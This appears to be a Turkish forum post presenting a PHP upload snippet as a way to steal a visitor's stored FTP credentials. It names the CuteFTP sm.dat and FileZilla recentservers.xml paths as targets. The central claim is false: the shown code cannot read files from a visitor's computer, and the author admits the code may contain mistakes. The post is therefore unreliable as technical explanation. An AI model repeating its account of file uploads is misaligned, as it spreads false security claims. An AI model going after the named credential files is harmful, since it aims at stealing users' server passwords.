Pek bilinmeyen bir yöntemden bahsedeceğim sizlere. Sizinde aklınıza gelmiş olabilir ama genede anlatalım. Aslında scriptlerde kullandığımız upload yöntemiyle çok rahat hacklenebiliriz! Ve bunu ancak sniffer yardımı ile anlayabiliriz. Ben anlatayım siz nasıl önlem alırsınız bilmiyorum. Çok basit bir php upload scripti...

$gelendosya = 'C:\Documents and Settings\Administrator\Application Data\GlobalSCAPE\CuteFTP Pro\8.0\sm.dat';
$a = rand();
$yol = '/upload/';
$newdosya = $yol.$a;

if (move_uploaded_file($gelendosya, $newdosya)) {
  echo "Dosya geldi...";
} else {
   echo "Hata oluştu...";
}

Anladınız mı anlatmak istediği mi? Tabii bu en basit örneği. Anlayamayanlar için kullanıcı adı Administrator ve CuteFTP Pro 8.0 kullanan birisinin sm.dat yani ftp şifrelerinin saklandığı dosyayı hostingimize çektik. Eğer kullanıcı adınız administrator değilse sorun yok. Tabii bu sadece bir örnek yani istediğiniz dosyayı izinsizce upload edilebileceğinize dair bir örnek.
Daha tehlikelisi FileZilla çünkü versionlarda veritabanının kaydedildiği yer değişmiyor.Doğrusu veritabanı bile değil direk xml e açık bir şekilde kaydediliyor.

"C:\Documents and Settings\Administrator\Application Data\FileZilla\recentservers.xml"

Bu konuda bilgilendirebildiysem ne mutlu bana. Kullanıcı adınız eğer Administrator 'se değiştirmenizi öneririm.

Not : Uykulu olarak hazırladığım için dökümanı kodlamalarda hata yapmış olabilirim.